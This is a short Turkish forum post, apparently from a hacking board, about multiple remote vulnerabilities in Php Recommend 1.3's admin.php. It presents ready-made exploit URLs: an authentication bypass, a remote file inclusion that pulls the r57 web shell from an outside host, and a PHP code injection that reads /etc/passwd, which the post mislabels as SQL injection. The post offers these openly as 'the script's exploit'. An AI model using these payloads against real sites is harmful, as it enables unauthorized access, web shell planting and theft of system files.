Php Recommend ’Admin.Php’
-
Php Recommend ’admin.php’ Çoklu Uzaktan Güvenlik açıkları
Php Recommend 1.3 aşağıdaki uzak zayıflıkları eğilimli:
- Bir kimlik doğrulama güvenlik açığı atlamak
- Bir kod enjeksiyon açığı
- Shell sokma açığı
Hackerlar etkilenen uygulama veya enjekte ve kötü niyetli PHP kodu çalıştırmak sanaldoku süreci çerçevesinde yetkisiz erişim elde edilebilir.
Php Recommend 1.3 savunmasızdır; diğer sürümleri de etkilenebilir.
Altta vereceğim linklerle Script’in exploitidir.
Kimlik doğrulama için atlama açığı:
www.site.com/admin.php?submit=submit&form_admin_user=USERNAME&form_admin_pass=PASSWORD
Shell sokma açığı :
www.site.com/admin.php?submit=submit&form_include_template=http://site.com/r57.txt?
SQL Injection açığı :
www.site.com/admin.php?submit=submit&form_aula=’;readfile(’/etc/passwd’);’
Toplam Hit: 2326 Toplam Mesaj: 1
